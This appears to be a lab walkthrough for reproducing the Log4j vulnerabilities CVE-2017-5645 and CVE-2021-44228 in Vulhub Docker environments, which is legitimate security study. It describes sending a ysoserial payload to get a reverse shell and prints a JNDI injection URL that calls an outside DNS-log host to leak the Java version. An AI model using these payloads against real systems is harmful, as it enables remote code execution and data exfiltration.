Table of contents
CVE-2017-5645 (Log4j deserialization vulnerability)
CVE-2021-44228 (Log4j 2 Remote Code Execution Vulnerability)
Introduction to log4j
Apache Log4j is a logging library for Java that supports starting remote log servers.
tool link
- Vulhub official website link: https://vulhub.org
- Shell generation website link: https://forum.ywhack.com/shell.php
- ysoserial tool link: https://github.com/frohoff/ysoserial/releases
Vulnerability recurrence
CVE-2017-5645 (Log4j deserialization vulnerability)
Environment build
- Attacker IP 121.36.20.179
- Server IP 171.20.10.5
Vulnerability principle
Apache Log4j 2.x prior to 2.8.2 has a security vulnerability that could be exploited by an attacker to execute arbitrary code.
Affected version
Log4j < 2.8.2
Vulnerability recurrence
1. Switch to the CVE-07-5645 directory, then run the `docker-compose up -d` command, and then run the `docker-compose ps` command to see that port 4712 is open, and the environment is built successfully.
2. Use the online website to generate base64 encrypted shell commands
3. Then use the ysoserial tool to send traffic to the server port 4712.
4. Listen to port 4445 of our attack machine, wait for the rebound shell, and you can see that the shell has successfully rebounded
CVE-2021-44228 (Log4j 2 Remote Code Execution Vulnerability)
Environment build
- Server IP 121.36.20.179
Vulnerability principle
There is a JNDI injection vulnerability in its version 2.0 to 2.14.1. When the attacker can control the log, by passing in the lookup like ${jndi:ldap://xxx.dns.com/com mond} For JNDI injection, execute arbitrary code.
Affected version
- 2.0<=log4j 2<=2.14.1
Vulnerability recurrence
1. Switch to the CVE-2021-44228 directory, then run the `docker-compose up -d` command, and then access the server port 8983, you can see that the environment is successfully built
2. Then visit the specified path`http://121.36.20.179:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version} .ekbkqh.dnsl og.cn }` Note: The area marked in red is the subdomain name generated in the dnslog. This vulnerability exists when the domain name has resolution records.
